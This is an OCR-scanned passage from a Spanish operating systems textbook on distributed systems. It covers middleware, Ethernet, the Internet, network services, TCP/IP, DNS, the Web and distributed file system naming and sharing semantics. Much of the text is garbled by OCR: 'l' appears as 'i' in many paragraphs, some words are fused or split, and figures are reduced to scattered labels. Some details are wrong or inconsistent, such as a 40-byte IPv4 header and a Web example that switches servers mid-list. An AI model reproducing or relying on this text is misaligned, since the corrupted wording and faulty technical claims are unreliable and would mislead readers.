electrónico y los programas de chat) y muchas aplicaciones emergentes (por ejemplo, el comercio elec¬ 
trónico, la telemedicina y el aprendizaje a distancia). El problema con todas estas aplicaciones 
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es que cada una tiene que reinventar ia rueda. Por ejempio, ei correo eiectrónico, FTP y Worid Wi- 
deWebfundamentaimente despiezan archivos dei puntoA ai puntoB, pero cada apiicación tiene su 
propia manera de hacerio, junto con sus propias convenciones de nomenciatura, protocoios de trans¬ 
ferencia, técnicas de dupiicación y todo io demás. Aunque muchos navegadores Web ocuitan ai 
usuario promedio estas diferencias, ios mecanismos subyacentes son compietamente distintos. 
Ocuitarios a nivei de ia interfaz de usuario es como hacer que una persona en un sitio Web de una 
agencia de viajes de servicio compieto ordene un viaje de Nueva York a San Francisco, y que no 
pueda averiguar sino hasta después si compró un boieto de avión, de tren o de autobús. 

Lo que agregan ios sistemas distribuidos a ia red subyacente es cierto paradigma (modeio) co¬ 
mún que ofrece una manera uniforme de ver todo ei sistema. La intención dei sistema distribuido 
es convertir un grupo de máquinas con una conexión débii en un sistema coherente, con base en un 
concepto. A igunas veces ei paradigma es simpie y otras es más ei aborado, pero ia idea es siempre 
proveer aigo que unifique ai sistema. 

En UNIX podemos encontrar un ejemplo simple de un paradigma unificador en un contexto li¬ 
geramente distinto, en donde todos los dispositivos de E/S se crean de manera que parezcan archi¬ 
vos. AI hacer que los teclados, impresoras y líneas en serie operen de la misma forma, con las mismas 
primitivas, se facilita el proceso de lidiar con ellos, en vez de que todos sean distintos en concepto. 

Una de las formas en que un sistema distribuido puede obtener cierta medida de uniformidad 
frente a los distintos sistemas operativos y el hardware subyacente es tener un nivel de software en¬ 
cima del sistema operativo. Este nivel, conocido como middleware, se ilustra en la figura 8-30. Es¬ 
te nivel provee ciertas estructuras de datos y operaciones que permiten a los procesos y usuarios que 
están en máquinas remotas interoperar de una manera consistente. 


Base común para las aplicaciones 



Figura 8-30. Posicionamiento del middleware en un sistema distribuido. 

En un sentido, el middleware es como el sistema operativo de un sistema distribuido. Esto ex¬ 
plica por qué lo estamos analizando en un libro sobre sistemas operativos. Por otra parte, en reali¬ 
dad no es un sistema operativo por lo que no realizaremos un análisis con mucho detalle. Para un 
tratamiento extenso de los sistemas distribuidos, consulte la obra Sistemas distribuidos (Tanenbaum 
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y van Steen, 2006). En el resto del capítulo analizaremos brevemente el hardware que se utiliza en 
un sistema distribuido (es decir, la red de computadoras subyacente) y después su software de co¬ 
municación (los protocolos de red). Después consideraremos una variedad de paradigmas que se 
utilizan en estos sistemas. 


8.4.1 H ardware de red 

Como los sistemas distribuidos se construyen sobre las redes de computadoras, veremos una peque¬ 
ña introducción a este tema. Las redes se clasifican en dos variedades principales: LANs (Redesde 
área local), que cubren un edificio o un campus, y las WANs (Redes de área amplia), que pueden 
ser a nivel de ciudad, del país o incluso a nivel mundial. El tipo de LAN más importante es Ether¬ 
net, por lo que la examinaremos como un ejemplo de LA N .Analizaremos Internet como un ejem¬ 
plo de WAN, aun cuando técnicamente Internet no es una red, sino una federación de miles de redes 
separadas. Sin embargo, para nuestros fines basta con considerarla como una WAN. 

Ethernet 

La Ethernet clásica, que se describe en el Estándar IEEE 802.3, consiste en un cable coaxial al que 
se conectan varias computadoras. A este cable se le conoce como Ethernet, en relación al éter lu¬ 
minífero por medio del cual se pensaba hace tiempo que se propagaba la radiación electromagnéti¬ 
ca. (Cuando el físico inglés james Clerk M axweil del siglo diecinueve descubrió que la radiación 
electromagnética se podía describir mediante una ecuación de onda, los científicos asumieron que 
este espacio debía llenarse con algún medio etéreo en el que se propagara la radiación. No fue sino 
hasta después del famoso experimento de M ichelson-M orley en 1887, en el que no se pudo detec¬ 
tar el éter, que los físicos se dieron cuenta de que la radiación se podía propagar en un vacío). 

En la primera versión de Ethernet, para conectar una computadora al cable literalmente se per¬ 
foraba un agujero a mitad del cable y se atornillaba un cable que iba a la computadora. A esto se 
le conocía como vampiretap (punción de vampiro) y se muestra de manera simbólica en la figu¬ 
ra 8-31(a). Era difícil hacer las punciones, por lo que se utilizaban conectares largos apropiados 
para ello. Sin embargo, en relación con la electricidad, todas las computadoras estaban conectadas 
como si los cables en sus tarjetas de interfaz de red estuvieran soldados. 

Para enviar un paquete en una red Ethernet, una computadora primero escucha en el cable pa¬ 
ra ver si hay otra computadora que esté transmitiendo en ese momento. Si no es así, sólo empieza 
a transmitir un paquete, el cual consiste en un encabezado corto seguido de una carga útil de 0 a 
1500 bytes. Si el cable está en uso, la computadora sólo espera hasta que termine la transmisión ac¬ 
tual y después empieza a enviar el paquete. 

Si dos computadoras empiezan a transmitir al mismo tiempo se produce una colisión, que am¬ 
bas detectan. Las dos computadoras responden terminando sus transmisiones, esperan una cantidad 
aleatoria de tiempo entre 0 y T pseg, y después empiezan de nuevo. Si ocurre otra colisión, todas 
las computadoras que participan en esa colisión esperan una cantidad aleatoria de tiempo en un 
intervalo de 0 a 2T pseg, y después intentan de nuevo. En cada colisión subsiguiente, el intervalo 
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Figura 8-31. (a) Ethernet clásica, (b) Ethernet conmutada. 


máximo de espera se duplica, con lo cual se reduce la probabilidad deque haya más colisiones. Es¬ 
te algoritmo se conoce como backoff exponencial binario. En secciones anteriores vimos cómo se 
utiliza este algoritmo para reducir la sobrecarga del sondeo en los bloqueos. 

Una red Ethernet tiene una longitud máxima de cable y también un número máximo de compu¬ 
tadoras que se pueden conectar. Para exceder cualquiera de estos límites, un edificio o campus gran¬ 
de se puede cablear con varias redes Ethernet, que a su vez se conectan mediante dispositivos 
conocidos como puentes (bridges). Un puente permite que el tráfico pase de una red Ethernet a otra 
cuando el origen está en un lado y el destino en el otro. 

Para evitar el problema de las colisiones, las redes Ethernet modernas utilizan switches, como 
se muestra en la figura 8-31(b). Cada switch tiene cierto número de puertos, a los cuales se puede 
conectar una computadora, una red Ethernet u otro switch. Cuando un paquete evita con éxito to¬ 
das las colisiones y llega al switch, se coloca en el búfer y se envía al puerto en el que vive la má¬ 
quina de destino. Al dar a cada computadora su propio puerto se pueden eliminar todas las 
colisiones, a expensas de requerir switches más grandes. También son posibles los compromisos 
con sólo unas cuantas computadoras por puerto. En la figura 8-31(b), una red Ethernet clásica con 
varias computadoras conectadas a un cable mediante punciones de vampiro está conectada a uno de 
los puertos del switch. 


I nternet 

Internet evolucionó de ARPANET, una red de conmutación de paquetes experimental, fundada 
por la Agencia de Proyectos Avanzados de Investigación del Departamento de Defensa de los 
EE.UU. Se puso en operación en diciembre de 1969, con tres computadoras en California y una 
en Utah. Se diseñó durante la Guerra Fría como una red con alta tolerancia a las fallas, que con¬ 
tinuara transmitiendo el tráfico militar inclusive en caso de que la red sufriera golpes nucleares 
directos en varias partes, mediante el re-enrutamiento automático del tráfico alrededor de las má¬ 
quinas inutilizadas. 
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ARPANET creció con rapidez en ia década de 1970, y iiegó a tener cientos de computadoras. 
Después se conectaron una red de radi opaquetes, una red sateiitai y finai mente mi i es de redes 
Ethernet, con io cuai surgió ia federación de redes que ahora conocemos como Internet. 

Internet consiste en dos tipos de computadoras: hosts y enrutadores. Los hosts son PCs, note- 
books, dispositivos de boisiiio, servidores, mainframesy otras computadoras que poseen individuos 
o empresas que se desean conectar a Internet. Los enrutadores son computadoras de conmutación 
especiaiizadas, que aceptan ios paquetes entrantes de una de varias iíneas entrantes, y ios envían a 
io iargo de muchas iíneas sai i entes. Un enrutador es simiiar ai interruptor de ia figura 8-31(b), pe¬ 
ro también tiene ciertas diferencias que no son de nuestra incumbencia por ei momento. Los enru¬ 
tadores se conectan entre sí en grandes redes, en donde cada enrutador tiene cabies o fibras que van 
a muchos otros enrutadores y hosts. Las compañías teiafónicas y ios ISPs (Proveedores de Servicio 
de Internet) operan extensas redes de enrutadores nacionales o mundiales para sus clientes. 

En la figura 8-32 se muestra una porción de Internet. En la parte superior tenemos uno de los 
backbones, controlado comúnmente por un operador de backbone. Consiste en un número de enru¬ 
tadores conectados mediante fibra óptica de alta capacidad de ancho de banda, con conexiones a los 
backbones operados por otras compañías telefónicas (competidoras). Por lo general ningún host se 
conecta directamente al backbone, con la excepción de las máquinas de mantenimiento y prueba 
que opera la compañía telefónica. 



Figura 8-32. U na porción de I nternet. 


Las redes regionales y los enrutadores en los ISPs se conectan a los enrutadores del backbone 
medí ante fibra óptica de velocidad media. A su vez, cada una délas redes Ethernet corporativas con- 
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tiene un enrutador, y estos enrutadores se conectan a los enrutadores de las redes regionales. Los 
enrutadores en los ISPs se conectan a los bancos de módems utilizados por los clientes del ISP. De 
esta forma, cada host en Internet tiene por lo menos una ruta, y a menudo muchas rutas, hacia ca¬ 
da uno de los otros hosts. 

Todo el tráfico en Internet se envía en forma de paquetes. Cada paquete lleva en su interior la 
dirección de destino, y esta dirección es la que se utiliza para el enrutamiento. Cuando llega un pa¬ 
quete a un enrutador, éste extrae la dirección de destino y la busca (parte de ella) en una tabla para 
saber en qué línea saliente debe enviar el paquete, y por endea cuál enrutador. Este procedimiento 
se repite hasta que el paquete llega al host de destino. Las tablas de enrutamiento son muy dinámi¬ 
cas y se actualizan en forma continua, ya que los enrutadores y los enlaces interrumpen y reanudan 
su conexión a medida que cambian las condiciones del tráfico. 


8.4.2 Protocolos y servicios de red 

Todas las redes de computadoras ofrecen ciertos servicios a sus usuarios (hosts y procesos), que im- 
plementan mediante el uso de ciertas reglas sobre los intercambios de mensajes legales. A continua¬ 
ción veremos una breve introducción a estos temas. 

Servicios de red 

Las redes de computadoras proveen servicios a los hosts y procesos que las utilizan. El servicio 
orientado a conexión se modela con base en el sistema telefónico. Para hablar con alguien, usted 
toma el teléfono, marca el número, habla y después cuelga. De manera similar, para utiliza un ser¬ 
vicio de red orientado a conexión, el usuario del servicio establece primero una conexión, la utili¬ 
za y después la libera. El aspecto esencial de una conexión es que actúa como un tubo: el emisor 
mete los objetos (bits) en un extremo y el receptor los saca en el mismo orden del otro extremo. 

Por el contrario, el servicio orientado a no conexión se modela con base en el sistema postal. 
Cada mensaje (carta) lleva la dirección de destino completa, y se enruta a través del sistema de ma¬ 
nera independiente a los otros mensajes. Por lo general, cuando se envían dos mensajes al mismo 
destino, el primero que se envíe será el primero en llegar. No obstante, es posible que el primero 
que se envíe tenga un retraso y el segundo llegue primero. Con un servicio orientado a conexión, 
esto es imposible. 

Cada servicio se puede caracterizar con base en la caiidad dei servicio. A Igunos servicios son 
confiables en cuanto a que nunca pierden datos. Por lo general, para implementar un servicio con¬ 
fiable el receptor debe confirmar la recepción de cada mensaje, para lo cual envía de vuelta un pa¬ 
quete de reconocimiento especial, de manera que el emisor esté seguro de que llegó el mensaje. 
El proceso de reconocimiento introduce sobrecarga y retrasos, los cuales son necesarios para detec¬ 
tar la pérdida de paquetes, pero disminuyen la velocidad de operación. 

Una situación común en la que es apropiado un servicio orientado a conexión confiable es la 
transferencia de un archivo. El propietario del archivo desea estar seguro de que los bits lleguen en 
forma correcta y en el mismo orden en el que se enviaron. M uy pocos clientes de transferencias de 
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archivos preferirían un servicio que en ocasiones revoiviera o perdiera unos cuantos bits, aunque 
fuera más rápido. 

Ei servicio orientado a conexión confiabie tiene dos variantes menores: secuencias de mensa¬ 
jes y fiujos de bytes. En ia primera variante, se preservan ios iímitesdeios mensajes. Cuando se en¬ 
vían dos mensajes de 1 KB, iiegan como dos mensajes distintos de 1 KB cada uno, y nunca como 
un soio mensaje de 2 KB. En ia segunda variante, i a conexión es si mpi emente un fiujo de bytes, sin 
iímites en ios mensajes. Cuando iiegan 2K bytes ai receptor, no hay forma de saber si se enviaron 
como un mensaje de 2 KB, dos mensajes de 1 KB cada uno o 2048 mensajes de 1 byte. Si se en¬ 
vían ias páginas de un iibro a través de una red a un compositor de imagen como mensajes separa¬ 
dos, tai vez sea importante preservar ios iímites de ios mensajes. Por otra parte, cuando una terminai 
se conecta a un sistema remoto de tiempo compartido, todo io que se necesita es un fiujo de bytes 
de i a terminai a i a computadora. 

Para aigunas apiicaciones, ios retrasos que se introducen debido a ios reconocimientos son ina- 
ceptabies. U na de esas apiicaciones es ei tráfico de voz. Es preferibie que ios usuarios de teiéfonos 
escuchen un poco de ruido en ia iínea o una paiabra confusa de vez en cuando, que introducir un 
retraso para esperar ios reconocimientos. 

No todas ias apiicaciones requieren conexiones. Por ejempio, para evaiuar ia red todo io que se 
necesita es una manera de enviar un soio paquete que tenga una aita probabiiidad de iiegar, pero 
que no haya garantía. A menudo, ai servicio sin conexión no confiabie (io que significa que no hay 
reconocimientos) se ie conoce como servicio dedatagramas debido a su simiiitud con ei servicio 
de teiegramas, que tampoco envía una señai de reconocimiento de vueita ai emisor. 

En otras situaciones es conveniente no tener que estabiecer una conexión para enviar un men¬ 
saje corto, pero ia confiabiiidad esesenciai. Para estas apiicaciones se puede proporcionar ei servi¬ 
cio de datagramas con reconocimiento. Es como enviar una carta registrada y soiicitar un acuse 
de recibo. Cuando ei acuse de recibo regrese, ei emisor estará absoiutamente seguro de que i a carta 
se entregó a ia parte interesada y no se perdió en ei camino. 

Otro de ios servicios es ei servicio desoiicitud-respuesta. En este servicio, ei emisor transmi¬ 
te un soio datagrama que contiene una soiicitud; esta petición contiene ia respuesta. Por ejempio, 
en esta categoría entra una consuita en ia bibiioteca iocai para saber en dónde se habia ei idioma 
Uigur. Ei servicio de soiicitud-respuesta se utiiiza comúnmente para impiementar ia comunicación 
en ei modeio ciiente-servidor: ei ciiente emite una soiicitud y ei servidor ie responde. En ia figu¬ 
ra 8-33 se sintetizan ios tipos de servicios antes descritos. 


Protocolos de red 

Todas ias redes tienen regias muy especiaiizadas para estabiecer qué mensajes se pueden enviar y 
qué respuestas se pueden devoiver en reiación con estos mensajes. Por ejempio, bajo ciertas cir¬ 
cunstancias (como ia transferencia de un archivo), cuando un mensaje se envía de un origen a un 
destino, se requiere que ei destino envíe un reconocimiento de vueita para indicar que recibió ei 
mensaje correctamente. Bajo otras circunstancias (como ia teiefonía digitai) no se espera dicho re¬ 
conocimiento. Ei conjunto de regias mediante ei cuai se comunican computadoras específicas se co¬ 
noce como protocolo. Existen muchos protocoios, inciuyendo ios de enrutador a enrutador, ios de 


588 


SISTEMAS DE M ULTIPLES PROCESADORES 


CAPITULO 8 


Orientado a conexión 


Orientado a no conexión 


Servicio 

Ejempio 

Flujo de mensajes confiable 

Secuencia de páginas de un libro 

Flujo de bytes confiable 

Inicio de sesión remoto 

Conexión no confiable 

Voz digitalizada 

Datagrama no confiable 

Paguetes de prueba de red 

Datagrama reconocido 

Correo registrado 

Solicitud-respuesta 

Consulta de base de datos 


Figura 8-33. Seis tipos distintos de servicio de red. 


host a host y varios más. Para un tratamiento detallado de las redes de computadoras y sus proto¬ 
colos, consulte la obra Computer Networks (Tanenbaum, 2003). 

Todas las redes modernas utilizan una pila de protocolos para distribuir los distintos protoco¬ 
los en niveles, uno encima de otro. En cada nivel se lidia con distintas cuestiones. Por ejemplo, en 
el nivel inferior los protocolos definen la forma de saber en dónde empieza y termina un paquete 
en el flujo de bits. En un nivel más alto, los protocolos definen cómo enrutar los paquetes a través 
de redes complejas, del origen al destino. Y a un nivel todavía más alto, se aseguran de que todos 
los paquetes en un mensaje compuesto por varios paquetes hayan llegado en forma correcta y en el 
orden apropiado. 

Como la mayoría délos sistemas distribuidos utilizan Internet como base, los protocolos base 
que utilizan estos sistemas son los dos protocolos principales de Internet: IP y TCP. IP (Protocolo 
de Internet) es un protocolo de datagramas, en el cual un emisor inyecta un datagrama de hasta 
64 KB en la red, y espera que llegue. No sedan garantías. El datagrama se puede fragmentar en pa¬ 
quetes más pequeños a medida que pasa por Internet. Estos paquetes viajan de manera independien¬ 
te, tal vez a lo largo de distintas rutas. Cuando todas las piezas llegan a su destino, se ensamblan en 
el orden correcto y se entregan. 

En la actualidad se utilizan dos versiones de IP: v4 y v6. Aquí vamos a analizar la versión v4, 
que aún domina el mercado, pero v6 está ganando terreno. Cada paquete v4 empieza con un enca¬ 
bezado de 40 bytes que contiene una dirección de origen de 32 bits y una dirección de destino de 
32 bits, entre otros campos. A éstas se les conoce como direcciones IP y forman la base del enru- 
tamiento en Internet. Por convención se escriben como cuatro números decimales en el rango de 
0 a 255 separados por puntos, como en 192.31.231.65. Cuando un paquete llega a un enrutador, és¬ 
te extrae la dirección IP de destino y la utiliza para enrutar el paquete. 

Como los datagramas IP no utilizan señales de reconocimiento, no es suficiente el protocolo IP 
para una comunicación confiable en Internet. Para proveer una comunicación confiable, por lo ge¬ 
neral se utiliza otro protocolo conocido como TCP (Protocolo de control de transmisión) que se 
coloca en un nivel encima de IP. TCP utiliza a IP para proveer flujos orientados a conexión. Para 
utilizarTCP, un proceso establece primero una conexión a un proceso remoto. El proceso requeri¬ 
do se especifica mediante la dirección IP de una máquina y un número de puerto en esa máquina. 
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en el que escuchan los procesos interesados en recibir conexiones entrantes. Una vez que se ha rea- 
iizado esto, sóio se inyectan bytes en ia conexión y se garantiza que saidrán por ei otro extremo sin 
daños y en ei orden correcto. Para iograr esta garantía, ia impiementación deTCP utiiiza números 
de secuencia, sumas de comprobación y retransmisiones de ios paquetes que se reciben en forma 
incorrecta. Todo esto es transparente para ios procesos emisor y receptor. Éstos sóio ven una comu¬ 
nicación confiabie entre procesos, justo iguai que una canaiización en U NIX. 

Para ver cómo interactúan todos estos protocoios, considere ei caso más simpie de un mensaje 
muy pequeño que no se necesita fragmentar en ningún nivei. Ei host se encuentra en una red Ether¬ 
net conectada a Internet. ¿Qué ocurre con exactitud? Ei proceso de usuario genera ei mensaje y rea- 
iiza una iiamada ai sistema para enviado en una conexión TCP que se haya estabiecido de 
antemano. La piia de protocoios dei kernei agrega un encabezado TCP y después un encabezado IP 
en ia parte frontai. Después pasa ai driver de Ethernet, que agrega un encabezado Ethernet para di¬ 
rigir ai paquete ai enrutador en Ethernet. Después este enrutador inyecta ei paquete en Internet, co¬ 
mo se ilustra en la figura 8-34. 


Internet • 



Ethernet 


Encabezados 


Figura 8-34. Acumulación de encabezados de paquetes. 


Para establecer una conexión con un host remoto (o incluso para enviarle un datagrama) es 
necesario conocer su dirección IP. Como es inconveniente para las personas administrar listas de 
direcciones IP de 32 bits, se inventó un esquema llamado DNS (Sistema de nombres de domi¬ 
nio) como una base de datos para asignar nombres ASCII para los hosts a sus direcciones IP. Por 
ende, es posible utilizar el nombre DNS star.cs.vu.nl en vez de la correspondiente dirección IP 
130.37.24.6. Los nombres DNS son muy conocidos debido a que las direcciones de correo elec¬ 
trónico en Internet son de la forma nombre-usuario® nombre-host-DNS. Este sistema de nomen¬ 
clatura permite que el programa de correo en el host emisor busque la dirección IP del host de 
destino en la basede datos DNS, que establezca una conexiónTCP con el proceso demonio de co¬ 
rreo ahí y envíe el mensaje como un archivo. El nombre-usuario se envía también para identificar 
en qué bandeja de correo se debe colocar el mensaje. 
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8.4.3 M iddieware basado en documentos 

A hora que tenemos ciertos antecedentes sobre las redes y los protocolos, podemos empezar a ana¬ 
lizar los distintos niveles de middieware que se pueden superponer en la red básica para producir 
un paradigma constante para las aplicaciones y los usuarios. Empezaremos con un ejemplo simple, 
pero muy conocido: World W i de Web. Tim Berners-Lee inventó el servicio Web en 1989 en CERN, 
el Centro Europeo de Investigación de Física Nuclear, y desde entonces se ha esparcido como fue¬ 
go arrasador por todo el mundo. 

El paradigma original detrás de Web era muy simple: cada computadora podía contener uno o 
más documentos, llamados páginas Web. Cada página Web contiene texto, imágenes, iconos, so¬ 
nidos, películas y demás, así como hipervínculos (apuntadores) a otras páginas Web. Cuando un 
usuario solicita una página Web mediante el uso de un programa llamado navegador Web, la pági¬ 
na se muestra en la pantalla. Al hacer clic en un vínculo, la página actual se sustituye en la panta¬ 
lla por la página a la que apunta el vínculo. Aunque en años recientes se han agregado muchos 
complementos al Web, es evidente que el paradigma subyacente aún sigue presente: Web es un gran 
grato dirigido de documentos que pueden apuntar a otros documentos, como se muestra en la figu¬ 
ra 8-35. 



Figura 8-35. Web es un gran grato dirigido de documentos. 


Cada página Web tiene una dirección única, conocida como URL (U niform Resource Lovator, 
Localizador uniforme de recursos), de la forma protocolo://nombre-DNS/nombre-archivo. El pro¬ 
tocolo más común es http (Protocolo de transferencia de hipertexto), pero también existen otros 
protocolos como ftp. Después se utiliza el nombre DNS del host que contiene el archivo. Por últi¬ 
mo, hay un nombre de archivo local que indica cuál es el archivo que se necesita. 

A continuación veremos la forma en que funciona el sistema completo. En esencia. Web es un 
sistema cliente-servidor en donde el usuario es el cliente y el sitio Web es el servidor. Cuando el 
usuario proporciona un URL al navegador, ya sea escribiéndolo o haciendo clic en un hipervínculo 
en la página actual, el navegador realiza ciertos pasos para obtener la página Web solicitada. Como 
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un ejemplo simple, suponga que el URL que se proporciona es http://www.minix3.org/doc/faq.html. 
Después, el navegador realiza los siguientes pasos para obtener la página: 

1. El navegador pide al DNS la dirección IP de www.minix3.org. 

2. DNS responde con 130.37.20.20. 

3. El navegador realiza una conexión TCP al puerto 80 en 130.37.20.20. 

4. Después envía una petición por el archivo doc/faq.htmi. 

5. El servidor www.acm.org envía el archivo doc/faq.htmi. 

6. Se libera la conexión TCP. 

7. El navegador muestra todo el texto en doc/faq.htmi. 

8. El navegador obtiene y muestra todas las imágenes en doc/faq.htmi. 

En principio, ésta es la base deWeb y la forma en que funciona. Desde entonces se han agre¬ 
gado muchas otras características al Web básico, incluyendo hojas de estilo en cascada, páginas 
Web dinámicas que se generan al instante, páginas Web que contienen pequeños programas o se¬ 
cuencias de comandos que se ejecutan en la máquina cliente y mucho más, pero esto queda fuera 
del alcance de este análisis. 

8.4.4 M iddieware basado en sistemas de archivos 

La idea básica detrás de la Web es hacer que un sistema distribuido tenga la apariencia de una co¬ 
lección gigante de documentos hipervinculados. U n segundo método sería hacer que un sistema dis¬ 
tribuido tenga la apariencia de un gran sistema de archivos. En esta sección analizaremos algunas 
de las cuestiones involucradas en el diseño de un sistema de archivos a nivel mundial. 

Utilizar un modelo de sistema de archivos para un sistema distribuido significa que hay un solo 
sistema de archivos global, en el que usuarios de todo el mundo tienen autorización de leer y escribir 
en archivos. Para lograr la comunicación, un proceso tiene que escribir datos en un archivo y otros 
procesos tienen que leer los datos de vuelta. Aquí surgen muchos de los problemas estándar con 
los sistemas de archivos, pero también aparecen nuevos problemas relacionados con la distribución. 

M odelo de transferencia 

La primera cuestión es la elección entre el modelo de envío/descarga y el modelo de acceso remo¬ 
to. En el primer modelo, que se muestra en la figura 8-36(a), para que un proceso pueda utilizar un 
archivo debe copiarlo primero del servidor remoto en el que se encuentra. Si el archivo sólo se va a 
leer, se lee entonces de manera local, para obtener un alto rendimiento. Si el archivo se va a escribir, 
se escribe de manera local. Cuando el proceso termina de usar el archivo, coloca el archivo actuali¬ 
zado devuelta en el servidor. Con el modelo de acceso remoto, el archivo permanece en el servidor 
y el cliente le envía comandos para realizar el trabajo ahí, como se muestra en la figura 8-36(b). 
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1. El cliente obtiene el archivo 



Archivo antiguo 
Archivo nuevo 


2. Los accesos 3- Cuando el cliente 
qp rpali 7 an pn termina, devuelve 

d cliente el archivo al servidor 


Cliente 


Servidor 


Petición, 

on 

n 

Respuesta 





El archivo 
permanece 
en el servidor 


(a) 


(b) 


Figura 8-36. (a) El modelo de envío/descarga, (b) El modelo de acceso remoto. 


Las ventajas del modelo de envío/descarga son su simplicidad y el hecho de que es más efi¬ 
ciente transferir todos los datos entre archivos a la vez que transferirlos en piezas pequeñas. Las des¬ 
ventajas son que debe haber suficiente espacio de almacenamiento para todo el archivo en forma 
local, desplazar el archivo completo es un desperdicio si sólo se necesitan piezas de éste, y surgen 
problemas de consistencia si hay varios usuarios concurrentes. 

L a jerarquía de directorios 

Los archivos sólo son parte de la historia: la otra parte es el sistema de directorios. Todos los sis¬ 
temas de archivos distribuidos aceptan directorios que contienen varios archivos. El siguiente 
problema de diseño es si todos los clientes tienen la misma vista de la jerarquía de directorios. 
Como ejemplo de lo que queremos, considere la figura 8-37. En la figura 8-37(a) mostramos dos 
servidores de archivos, cada uno de los cuales contiene tres directorios y ciertos archivos. En la 
figura 8-37(b) tenemos un sistema en el que todos los clientes (y otras máquinas) tienen la mis¬ 
ma vista del sistema de archivos distribuido. Si la ruta /D/E/x es válida en una máquina, es váli¬ 
da en todos ellos. 

En contraste, en la figura 8-37(c) hay distintas máquinas que pueden tener distintas vistas del 
sistema de archivos. Para repetir el ejemplo anterior, la ruta /D/E/x podría ser válida en el cliente 1, 
pero no en el cliente 2. En los sistemas que administran varios sistemas de archivos mediante el 
montaje remoto, la figura 8-37(c) es la norma. Es flexible y simple de implementar, pero tiene la 
desventaja de que no hace que todo el sistema se comporte como un sistema individual de tiempo 
compartido a la antigua. En un sistema de tiempo compartido todos los procesos ven el mismo sis¬ 
tema de archivos, como en el modelo de la figura 8-37(b). Esta propiedad facilita la programación 
y comprensión del sistema. 

U na pregunta muy relacionada es si debe haber o no un directorio raíz global, que todas las má¬ 
quinas reconozcan como el directorio raíz. Una manera de tener un directorio raíz global es hacer 
que la raíz contenga una entrada para cada servidor y nada más. Bajo estas circunstancias, las rutas 
toman la forma /servidor/ruta, lo cual tiene sus propias desventajas, pero al menos es lo mismo en 
cualquier parte del sistema. 
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Servidor de archivos 1 Cliente 1 Cliente 1 



Servidor de archivos 2 



ni 


(a) 


Cliente 2 



(b) 


Cliente 2 


Raíz 
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nm 
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Figura 8-37. (a) Dos servidores de archivos. Los cuadros son directorios y ios circuios 
son archivos, (b) U n sistema en ei que todos ios Chentes tienen ia misma vista dei sis¬ 
tema de archivos, (c) U n sistema en ei que distintos Chentes pueden tener distintas vis¬ 
tas dei sistema de archivos. 


Transparencia de nomenclatura 

El principal problema con esta forma de nomenclatura es que no es totalmente transparente. Hay 
dos formas de transparencia relevantes en este contexto que vale la pena distinguir. En la primera, 
conocida como transparencia de localización, el nombre de ruta no da ninguna pista sobre la ubi¬ 
cación del archivo. Una ruta como /servidorl/dirl/dir2/x indica que el archivo x está ubicado en el 
servidor 1, pero no indica en dónde se encuentra ese servidor. El servidor se puede mover a cual¬ 
quier parte en la red sin tener que cambiar el nombre de la ruta. Por ende, este sistema tiene trans¬ 
parencia de ubicación. 

A hora suponga que el archivo x es muy grande y que el espacio está restringido en el servidor 1. 
Además, suponga que hay mucho espacio en el servidor 2. El sistema podría mover el archivo x al 
















































594 


SISTEMAS DE MULTIPLES PROCESADORES 


CAPITULO 8 


servidor 2 de manera automática. Por desgracia, cuando ei primer componente de todos ios nom¬ 
bres de ruta es ei servidor, ei sistema no puede mover ei archivo ai otro servidor de manera auto¬ 
mática, aun si dirl y dir2 existen en ambos servidores. Ei probiema es que ai mover ei archivo de 
manera automática se cambia su nombre de ruta de /servidorl/dirl/dir2/x a /servidor2/dirl/dir2/x. 
Los programas que contienen ia primera cadena dejarán de funcionar si cambia ia ruta. Se dice que un 
sistema en ei que se pueden mover archivos sin cambiar sus nombres tiene independencia deubica¬ 
ción. U n sistema distribuido que incrusta ios nombres de máquinas o de servidores en ios nombres de 
ias rutas en definitiva no es independiente de ia ubicación. Un sistema basado en ei montaje remoto 
tampoco io es, ya que no es posibie mover un archivo de un grupo de archivos (ia unidad de monta¬ 
je) a otro y poder seguir uti i izando ei nombre de ruta anterior. Noesfácii iograr ia independencia de 
ia ubicación, pero es una propiedad conveniente de tener en un sistema distribuido. 

Para resumir io que dijimos antes, hay tres métodos comunes para nombrar archivos y directo¬ 
rios en un sistema distribuido: 

1. Usar ia nomenciatura de máquina -l- ruta, como /máquina/ruta o máquina:ruta. 

2. M ontar ios sistemas de archivos remotos en ia jerarquía de archivos iocai. 

3. U n soio espacio de nombres que sea iguai para todas ias máquinas. 

Los primeros dos métodos son fáciies de impiementar, en especiai como una forma de conectar ios 
sistemas existentes que no fueron diseñados para un uso distribuido. Ei tercer método es difícii y 
requiere un diseño cuidadoso, pero faciiita ia vida a ios programadores y usuarios. 

Semántica de la compartición de archivos 

Cuando dos o más usuarios comparten ei mismo archivo, es necesario definir ia semántica de ieer 
y escribir con precisión para evitar probiemas. En ios sistemas con un soio procesador, ia semánti¬ 
ca por io generai estabiece que cuando una ñamada ai sistema read va después de una ñamada ai 
sistema wnite, ia ñamada a read devueive ei vaior que se acaba de escribir, como se muestra en ia 
figura 8-38(a). De manera simiiar, cuando se reaiizan dos ñamadas a write en sucesión rápida, se¬ 
guidas de una ñamada a read, ei vaior ieído es ei vaior aimacenado por ia úitima escritura. En efec¬ 
to, ei sistema impiementa un orden en todas ias ñamadas ai sistema, y todos ios procesadores ven 
ei mismo orden. A este modeio ie ñamaremos consistencia secuencial. 

En un sistema distribuido, ia consistencia secuenciai se puede obtener fáciimente mientras ha¬ 
ya sóio un servidor de archivos y ios Chentes no coioquen archivos en ia caché. Todas ias ñamadas 
a read y write van directamente ai servidor de archivos, que ias procesa estrictamente en forma se¬ 
cuenciai. 

Sin embargo, en ia práctica ei rendimiento de un sistema distribuido en ei que todas ias peti¬ 
ciones de archivos deben enviarse a un soio servidor es, con frecuencia, pobre. A menudo, este pro¬ 
biema se resueive ai permitir que ios Chentes mantengan copias iocai es de archivos de uso frecuente 
en suscachés privadas. No obstante, si ei ciiente 1 modifica de manera iocai un archivo en caché y, 
poco tiempo después, ei ciiente 2 iee ei archivo dei servidor, ei segundo ciiente obtendrá un archi¬ 
vo obsoieto, como se iiustra en ia figura 8-38(b). 
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Cliente 1 



Figura 8-38. (a) Consistencia secuenciai. (b) En un sistema distribuido con caché, ai 
ieer un archivo se puede obtener un vaior obsoieto. 


Una manera de solucionar esta dificultad es propagar todos los cambios a los archivos en ca¬ 
ché de vuelta al servidor de manera inmediata. Aunque este método es simple en concepto, es ine¬ 
ficiente. Una solución alternativa es relajar la semántica de la compartición de archivos. En vez de 
requerir una llamada a read para ver los efectos de todas las llamadas anteriores a write, podemos 
tener una nueva regla que establezca lo siguiente: "Los cambios a un archivo abierto son visibles 
